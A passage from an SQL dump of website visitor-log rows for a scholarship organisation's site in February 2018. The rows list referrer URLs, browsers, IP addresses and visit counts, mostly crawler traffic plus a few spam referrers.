nown','','173.252.99.17','000',4,0),(22676,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.23','000',1,0),(22677,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.20','000',2,0),(22678,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.208','000',2,0),(22679,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.184','000',2,0),(22680,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.160','000',2,0),(22681,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.117','000',1,0),(22682,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.100','000',1,0),(22683,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.175','000',1,0),(22684,'2018-02-17','http://zphiblgz.org/scholarship/','Chrome','Windows','63.0.3239.84','','73.213.27.103','000',3,0),(22685,'2018-02-17','http://spy-app.info/mobile-spy-app/','MSIE','Windows','5.5','','178.137.16.45','000',3,0),(22686,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','85.128.142.76','000',3,0),(22687,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.201','000',3,0),(22688,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.58','000',2,0),(22689,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.217','000',1,0),(22690,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.116','000',2,0),(22691,'2018-02-17','https://www.google.com/','Chrome','Windows','64.0.3282.167','','50.243.62.137','000',1,0),(22692,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','2.229.17.86','000',3,0),(22693,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','93.125.99.77','000',2,0),(22694,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','217.182.172.233','000',1,0),(22695,'2018-02-17','https://www.bing.com/','Edge','Windows','16.16299','','69.244.72.6','000',2,0),(22696,'2018-02-17','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(22697,'2018-02-17','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.32','000',1,0),(22698,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.222','000',1,0),(22699,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.216','000',1,0),(22700,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.55','000',3,0),(22701,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.123','000',2,0),(22702,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.170','000',1,0),(22703,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.228','000',1,0),(22704,'2018-02-17','https://zphiblgz.org','Chrome','Windows','34.0.1847.116','','146.185.144.64','000',2,0),(22705,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.204','000',2,0),(22706,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.25','000',2,0),(22707,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.199','000',3,0),(22708,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.28','000',2,0),(22709,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','178.33.169.214','000',1,0),(22710,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.194','000',1,0),(22711,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.215','000',2,0),(22712,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.115','000',1,0),(22713,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.21','000',1,0),(22714,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.119','000',1,0),(22715,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.144','000',3,0),(22716,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.151','000',1,0),(22717,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.37','000',2,0),(22718,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.112','000',1,0),(22719,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.103','000',2,0),(22720,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.87','000',1,0),(22721,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.32','000',1,0),(22722,'2018-02-17','https://zphiblgz.org','Firefox','Windows','58.0','','100.36.90.41','000',3,0),(22723,'2018-02-17','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','174.205.1.144','000',3,0),(22724,'2018-02-17','https://zphiblgz.org','MSIE','Windows','6.0','','146.185.223.202','000',1,0),(22725,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.60','000',1,0),(22726,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.114','000',3,0),(22727,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.54','000',3,0),(22728,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.226','000',1,0),(22729,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.42','000',2,0),(22730,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.49','000',1,0),(22731,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.212','000',1,0),(22732,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.203','000',2,0),(22733,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.16','000',1,0),(22734,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.223','000',1,0),(22735,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.75','000',1,0),(22736,'2018-02-17','https://zphiblgz.org','Safari','Linux','538.1','','192.3.143.15','000',2,0),(22737,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.22','000',1,0),(22738,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.149','000',1,0),(22739,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.179','000',1,0),(22740,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.132','000',1,0),(22741,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.54','000',2,0),(22742,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.148','000',2,0),(22743,'2018-02-17','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','174.205.16.4','000',2,0),(22744,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.246','000',1,0),(22745,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.184','000',2,0),(22746,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.65','000',1,0),(22747,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.170','000',4,0),(22748,'2018-02-17','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',2,0),(22749,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.201','000',1,0),(22750,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.107','000',2,0),(22751,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.25','000',2,0),(22752,'2018-02-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(22753,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.113','000',1,0),(22754,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.237','000',2,0),(22755,'2018-02-17','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','107.77.203.158','000',1,0),(22756,'2018-02-17','https://zphiblgz.org/','Safari','iPhone','11.0','','174.205.9.193','000',2,0),(22757,'2018-02-17','android-app://com.google.android.googlequicksearchbox','Chrome','Android','64.0.3282.137','','99.203.17.242','000',3,0),(22758,'2018-02-17','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','172.58.185.30','000',3,0),(22759,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.133','000',2,0),(22760,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.207','000',1,0),(22761,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.181','000',1,0),(22762,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',1,0),(22763,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.133','000',1,0),(22764,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.84','000',2,0),(22765,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.115','000',1,0),(22766,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.116','000',2,0),(22767,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.118','000',2,0),(22768,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.213','000',1,0),(22769,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.200','000',2,0),(22770,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.215','000',2,0),(22771,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.114','000',2,0),(22772,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.70','000',1,0),(22773,'2018-02-17','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','68.134.8.97','000',3,0),(22774,'2018-02-17','https://zphiblgz.org','Chrome','Windows','60.0.3112.113','','212.83.178.172','000',1,0),(22775,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.17','000',2,0),(22776,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.204','000',1,0),(22777,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.27','000',3,0),(22778,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.49','000',1,0),(22779,'2018-02-17','https://zphiblgz.org/','Safari','iPhone','11.0','','98.117.57.119','000',2,0),(22780,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.181','000',2,0),(22781,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.174','000',1,0),(22782,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.168','000',3,0),(22783,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.248','000',2,0),(22784,'2018-02-17','https://zphiblgz.org','Firefox','Windows','40.1','','107.159.47.207','000',2,0),(22785,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.199','000',2,0),(22786,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.187','000',2,0),(22787,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.126','000',2,0),(22788,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.36','000',2,0),(22789,'2018-02-17','https://zphiblgz.org','Safari','iPhone','9.0','','58.48.31.181','000',1,0),(22790,'2018-02-17','https://zphiblgz.org','Safari','iPhone','9.0','','175.152.30.164','000',1,0),(22791,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.165','000',2,0),(22792,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.197','000',2,0),(22793,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.21','000',1,0),(22794,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.119','000',1,0),(22795,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.85','000',1,0),(22796,'2018-02-17','https://zphiblgz.org','Firefox','Macintosh','57.0','','73.134.159.197','000',2,0),(22797,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.92','000',2,0),(22798,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.133','000',2,0),(22799,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.115','000',1,0),(22800,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.214','000',1,0),(22801,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.211','000',2,0),(22802,'2018-02-17','https://zphiblgz.org','Firefox','Linux','2.0.0.13','','88.99.197.94','000',1,0),(22803,'2018-02-17','https://zphiblgz.org/scholarship/application/','Edge','Windows','15.15063','','71.121.163.209','000',2,0),(22804,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.114','000',2,0),(22805,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.213','000',1,0),(22806,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.219','000',3,0),(22807,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.54','000',2,0),(22808,'2018-02-17','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.27.12','000',1,0),(22809,'2018-02-17','https://r.search.yahoo.com/_ylt=AwrBTzfPvYhav8EANWRx.9w4;_ylu=X3oDMTEyNmo4bTliBGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjUyNzdfMQRzZWMDc3I-/RV=2/RE=1518939727/RO=10/RU=https%3a%2f%2fzphiblgz.org%2f/RK=2/RS=Ff1iv26.dHOtEwM1qWi_DFpyO9A-','Safari','iPhone','11.0','','173.69.187.98','000',20,0),(22810,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.140','000',1,0),(22811,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.199','000',1,0),(22812,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.57','000',1,0),(22813,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.136','000',2,0),(22814,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.177','000',1,0),(22815,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.79','000',3,0),(22816,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.119','000',1,0),(22817,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.184','000',2,0),(22818,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.115','000',2,0),(22819,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.124','000',1,0),(22820,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.214','000',1,0),(22821,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.210','000',1,0),(22822,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.247','000',1,0),(22823,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.64','000',2,0),(22824,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.193','000',1,0),(22825,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.179','000',1,0),(22826,'2018-02-17','https://zphiblgz.org','Chrome','Unknown','64.0.3264.0','','138.197.111.84','000',3,0),(22827,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.207','000',2,0),(22828,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.203','000',2,0),(22829,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.209','000',1,0),(22830,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.101','000',1,0),(22831,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.112','000',1,0),(22832,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.220','000',2,0),(22833,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.101','000',2,0),(22834,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.164','000',1,0),(22835,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.166','000',2,0),(22836,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.118','000',1,0),(22837,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.22','000',1,0),(22838,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.199','000',2,0),(22839,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.238','000',1,0),(22840,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.200','000',2,0),(22841,'2018-02-17','https://zphiblgz.org','Safari','iPhone','11.0','','73.129.0.8','000',3,0),(22842,'2018-02-17','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','34.253.211.133','000',2,0),(22843,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.155','000',2,0),(22844,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.112','000',2,0),(22845,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.246','000',1,0),(22846,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.136','000',2,0),(22847,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.118','000',1,0),(22848,'2018-02-17','https://zphiblgz.org','Safari','iPhone','11.0','','174.204.44.24','000',2,0),(22849,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.169','000',1,0),(22850,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.5','000',1,0),(22851,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.171','000',1,0),(22852,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.103','000',2,0),(22853,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.117','000',2,0),(22854,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.226','000',1,0),(22855,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.215','000',1,0),(22856,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.213','000',2,0),(22857,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.230','000',1,0),(22858,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.214','000',1,0),(22859,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.239','000',3,0),(22860,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.252','000',4,0),(22861,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.196','000',1,0),(22862,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.197','000',1,0),(22863,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.247','000',1,0),(22864,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.144','000',1,0),(22865,'2018-02-17','https://pillscheap24h.com/','MSIE','Windows','6.0','','178.137.178.122','000',2,0),(22866,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.125','000',3,0),(22867,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.208','000',1,0),(22868,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.83','000',2,0),(22869,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.202','000',1,0),(22870,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.73','000',1,0),(22871,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.72','000',2,0),(22872,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.71','000',2,0),(22873,'2018-02-17','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(22874,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.234','000',1,0),(22875,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.202','000',1,0),(22876,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.111','000',1,0),(22877,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.231','000',2,0),(22878,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.208','000',1,0),(22879,'2018-02-17','https://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','31.146.221.98','000',3,0),(22880,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.114','000',1,0),(22881,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.24','000',2,0),(22882,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.229','000',3,0),(22883,'2018-02-17','https://www.google.com/','Safari','iPhone','11.0','','68.33.74.102','000',4,0),(22884,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.144','000',2,0),(22885,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.162','000',1,0),(22886,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.169','000',1,0),(22887,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.150','000',1,0),(22888,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.180','000',1,0),(22889,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.225','000',1,0),(22890,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.28','000',2,0),(22891,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.203','000',1,0),(22892,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.74','000',1,0),(22893,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.195','000',7,0),(22894,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.237','000',1,0),(22895,'2018-02-18','https://xn----9sbubg3ambdfl1j.xn--p1ai/','MSIE','Windows','5.5','','134.249.48.151','000',3,0),(22896,'2018-02-18','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(22897,'2018-02-18','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(22898,'2018-02-18','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(22899,'2018-02-18','https://pills24h.com/buy-synthroid-levothyroxine-online-without-prescription/','MSIE','Windows','6.0','','178.137.162.218','000',2,0),(22900,'2018-02-18','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.195.159','000',1,0),(22901,'2018-02-18','https://zphiblgz.org/scholarship/application/','MSIE','Windows','10.0','','185.220.101.24','000',1,0),(22902,'2018-02-18','http://www.google.com/search?q=zphiblgz.org&ie=utf-8','Firefox','Windows','41.0','','169.55.147.137','000',1,0),(22903,'2018-02-18','http://www.google.com/search?q=zphiblgz.org&ie=utf-8','Firefox','Windows','41.0','','169.45.94.152','000',1,0),(22904,'2018-02-18','http://www.google.com/search?q=zphiblgz.org&ie=utf-8','Firefox','Windows','41.0','','168.1.207.108','000',1,0),(22905,'2018-02-18','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.162','000',1,0),(22906,'2018-02-18','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.142','000',3,0),(22907,'2018-02-18','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.30','000',1,0),(22908,'2018-02-18','http://www.google.com/search?q=zphiblgz.org&ie=utf-8','Firefox','Windows','41.0','','159.122.143.134','000',1,0),(22909,'2018-02-18','http://www.google.com/search?q=zphiblgz.org&ie=utf-8','Firefox','Windows','41.0','','169.57.65.172','000',1,0),(22910,'2018-02-18','http://www.google.com/search?q=zphiblgz.org&ie=utf-8','Firefox','Windows','41.0','','159.8.84.116','000',1,0),(22911,'2018-02-18','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.28','000',2,0),(22912,'2018-02-18','https://zphiblgz.org','MSIE','Windows','6.0','','204.101.161.159','000',1,0),(22913,'2018-02-18','http://10.220.1.2:8085/redirect.php?url=https://zphiblgz.org/scholarship/application/&referer=http://www.google.com','MSIE','Windows','11.0','','64.180.96.164','000',2,0),(22914,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','211.55.19.11','000',1,0),(22915,'2018-02-18','https://zphiblgz.org','Firefox','Windows','40.1','','79.176.81.81','000',2,0),(22916,'2018-02-18','https://pills24h.com/buy-celebrex-online-without-prescription/','MSIE','Windows','6.0','','178.137.178.122','000',4,0),(22917,'2018-02-18','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.28','000',1,0),(22918,'2018-02-18','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(22919,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.209','000',1,0),(22920,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.104','000',1,0),(22921,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.88','000',2,0),(22922,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.101','000',1,0),(22923,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.119','000',1,0),(22924,'2018-02-18','http://metallo-konstruktsii.ru/','MSIE','Windows','6.0','','134.249.48.151','000',6,0),(22925,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.9','000',1,0),(22926,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.231','000',3,0),(22927,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.25','000',2,0),(22928,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.214','000',2,0),(22929,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.227','000',1,0),(22930,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.140','000',1,0),(22931,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.122','000',4,0),(22932,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.133','000',1,0),(22933,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.179','000',2,0),(22934,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.22','000',1,0),(22935,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.147','000',1,0),(22936,'2018-02-18','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','176.9.35.231','000',1,0),(22937,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.149','000',2,0),(22938,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.33','000',1,0),(22939,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.187','000',1,0),(22940,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.93','000',1,0),(22941,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.19','000',2,0),(22942,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.151','000',1,0),(22943,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.76','000',1,0),(22944,'2018-02-18','https://zphiblgz.org','Safari','iPhone','11.0','','68.134.158.229','000',2,0),(22945,'2018-02-18','https://zphiblgz.org','MSIE','Windows','11.0','','73.133.120.5','000',2,0),(22946,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.113','000',1,0),(22947,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.240','000',1,0),(22948,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.28','000',1,0),(22949,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.216','000',2,0),(22950,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','